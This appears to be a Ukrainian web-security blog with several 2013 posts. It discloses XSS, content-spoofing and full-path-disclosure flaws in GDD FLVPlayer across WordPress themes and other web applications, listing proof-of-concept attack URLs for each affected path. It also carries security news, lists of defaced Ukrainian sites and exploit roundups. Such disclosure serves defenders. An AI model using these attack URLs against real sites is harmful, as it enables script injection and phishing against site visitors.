Websecurity - Веб безпека

Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них I Love It (про дірки в цій темі я вже писав), Megusta, Multipress, Lolzine, V1. Та існують інші уразливі теми для WordPress з gddflvplayer.swf.

XSS (через Flash Injection) (WASC-08):

I Love It:

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf

Megusta:

http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf

Multipress:

http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf

Lolzine:

http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf

V1:

http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/iloveit/

http://site/wp-content/themes/megusta/

http://site/wp-content/themes/multipress/

http://site/wp-content/themes/Lolzine/

http://site/wp-content/themes/v1/

В останній темі шлях може бути v1, v1.0, v1.3.5 та інші варіанти.

Наведені XSS та FPD уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі всі версії наступних веб додатків: I Love It, Megusta, Multipress, Lolzine, V1.

За повідомленням www.xakep.ru, PayPal закрила уразливість, що дозволяла видалити чужий акаунт.

Незалежний фахівець з безпеки Йонут Черніка, розкрив інформацію про серйозну уразливість на сайті платіжної системи PayPal. Донедавна будь-який бажаючий міг видалити чужий акаунт PayPal і створити новий під тим же ім’ям. Зараз уразливість вже виправлена працівниками платіжної системи.

Про дірявий PayPal я вже писав раніше.

За повідомленням ain.ua, за DDoS-атаку на сайт політичної партії киянину загрожує 6 років в’язниці.

Тридцатидвухлітнього киянина будуть судити за DDoS-атаку на сайт однієї з політичних партій. Зокрема, прокуратурою АР Крим був затверджений обвинувальний висновок у карному проваджені по факту блокування роботи сайта регіонального відділення однієї з політичних партій. Безпосередньо мережева атака, що була підкріплена підробкою звертання глави кримського уряду, відбулася під час останніх виборів.

Хоча в заяві прокуратури не фігурує назва політичної партії, не виключено, що мова йде про “Партію Регіонів”. У жовтні 2012 року сайт кримської республіканської організації “Партії регіонів” був взломаний, а пізніше на нього була проведена DDoS-атака.

Це вже третій затриманий DDoS-ер в Україні, про два подібних випадки я писав раніше. Першого затримали в 2009 році, а другого - на початку 2013 року.

За повідомленням www.xakep.ru, шкідливу програму Jekyll провели в каталог AppStore.

Традиційно прийнято вважати, що модерація мобільних додатків для включення в каталог Apple AppStore відбувається дуже ретельно, і провести туди шкідливе ПЗ неможливо. Фахівцям з безпеки з Технологічного інституту Джорджії (США) вдалося довести зворотне. Вони успішно помістили додаток у AppStore і зуміли реалізувати в ньому шкідливу функціональність за допомогою ROP-атаки (атака повернення в бібліотеку, Return Oriented Programming). Грамотно проведена ROP-атака дозволяє обійти захист за допомогою цифрового підпису в AppStore і механізм захисту DEP, що і зробив автор програми Тіелей Ванг.

Про malware в Google Play я вже писав, а зараз черга дійшла до Apple AppStore.

У серпні, 16.08.2013, вийшов Mozilla Firefox 23.0.1. Нова версія браузера вийшла лише через десять днів після виходу Firefox 23. І в ній виправлені баги допущені в останньому релізі.

Mozilla представила коригувальний випуск Firefox 23.0.1 у якому усунуті три помилки:

• Непрацездатність системи перевірки орфографії при розміщенні профілю в директорії, що містить не ASCII-символи.
• Порушення якості звуку при використанні WebRTC.
• Артефакти відображення при відтворенні H.264-відео в Windows Vista.

В даній добірці експлоіти в веб додатках:

• Samsung DVR Firmware 1.10 - Authentication Bypass Vulnerability (деталі)
• DeWeS 0.4.2 - Directory Traversal Vulnerability (деталі)
• Open-FTPD 1.2 Arbitrary File Upload Vulnerability (деталі)
• HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow (деталі)
• MinaliC Webserver 2.0.0 - Buffer Overflow (деталі)

Сьогодні я виявив Content Spoofing та Cross-Site Scripting уразливості в численних веб додатках з GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Зокрема в Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer для MODx, Pixelfind Administrator, WHMCompleteSolution. Та в інших веб додатках. А також цей флеш відео та аудіо плеєр використовується на багатьох сайтах як самостійний веб додаток.

XSS (через Flash Injection) (WASC-08):

Order Master Pro:

http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):

http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer для MODx:

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:

http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:

http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf

Наведені XSS уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі наступні веб додатки: усі версії Order Master Pro, CMS Pask 3 (Pixelwerk admin v.3.3) і попередні версії, усі версії gddflvplayer для MODx, усі версії Pixelfind Administrator та усі версії WHMCompleteSolution.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://podillyarehab.gov.ua (хакерами з islamic ghosts team) - 31.05.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.putivl-rda.gov.ua (хакером Dr.SHA6H) - 13.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.ndippp.gov.ua (хакером Dr.SHA6H) - 25.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.yuna.ua (хакером RBG HomS)
• http://visnik-press.com.ua (хакером RBG HomS) - 21.08.2013, зараз сайт вже виправлений адмінами

10.07.2013

У травні, 16.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в GDD FLVPlayer. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

23.08.2013

Content Spoofing (Flash Injection) (WASC-12):

http://site/gddflvplayer.swf?mylogo=http://site2/1.swf

http://site/gddflvplayer.swf?splashscreen=http://site2/1.swf

Можна включати флешки, в тому числі флешки з лінками.

XSS (через Flash Injection) (WASC-08):

http://site/gddflvplayer.swf?mylogo=xss.swf

http://site/gddflvplayer.swf?splashscreen=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Content Injection) (WASC-12):

http://site/gddflvplayer.swf?mylogo=http://site2/1.jpg

http://site/gddflvplayer.swf?splashscreen=http://site2/1.jpg

http://site/gddflvplayer.swf?advert=http://site2/1.flv

http://site/gddflvplayer.swf?vdo=http://site2/1.flv

Включення зображень і програш відео та аудіо (flv, mp4 та mp3 файлів) з зовнішніх сайтів.

Content Spoofing (Link Injection) (WASC-12):

http://site/gddflvplayer.swf?clickTAG=http://websecurity.com.ua

http://site/gddflvplayer.swf?vdo=http://site2/1.flv&endclipaction=http://websecurity.com.ua

Уразливі GDD FLVPlayer v3.635 та попередні версії.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Comment Extra Fields, Booking Calendar та Usernoise. Для котрих з’явилися експлоіти. Comment Extra Fields - це плагін для додавання нових полів в форму коментарів, Booking Calendar - це плагін для створення календаря замовлень, Usernoise - це контактна форма.

• WordPress Comment Extra Fields 1.7 CSRF / XSS (деталі)
• Booking Calendar 4.1.4 Cross Site Request Forgery (деталі)
• WordPress Usernoise 3.7.8 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В березні відбувся новий масовий взлом сайтів на сервері HostPro. Він тривав на протязі 12.03.2013-26.05.2013. Дев’ятий масовий взлом сайтів на сервері HostPro відбувся раніше.

Був взломаний сервер української компанії HostPro. Взлом складався з трьох невеликих дефейсів і одного крупного дефейса сайтів.

Всього було взломано 290 сайтів на сервері хостера HostPro (IP 80.91.189.17). Перелік сайтів можете подивитися на www.zone-h.org. Серед них українські державні сайти rayrada.gov.ua та dity-zhitomir.gov.ua.

З зазначених 290 сайтів 287 сайтів були взломані хакерами з islamic ghosts team, 1 сайт хакерами з BD GREY HAT HACKERS, 1 сайт хакером Hmei7 та 1 сайт хакером s13doeL.

Якщо невеликі дефейси по одному сайту явно були зроблені при взломах окремих сайтів, то стосовно одного великого дефейсу islamic ghosts team можна сказати, що враховуючи дефейс 287 сайтів за один день, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

В даній добірці експлоіти в веб додатках:

• Sitecom N300/N600 Devices - Multiple Vulnerabilities (деталі)
• Adobe ColdFusion 9 Administrative Login Bypass Vulnerability (деталі)
• Squash YAML Code Execution Vulnerability (деталі)
• Ruby on Rails Known Secret Session Cookie Remote Code Execution (деталі)
• Sami FTP 2.0.1 MKD Buffer Overflow Vulnerability (деталі)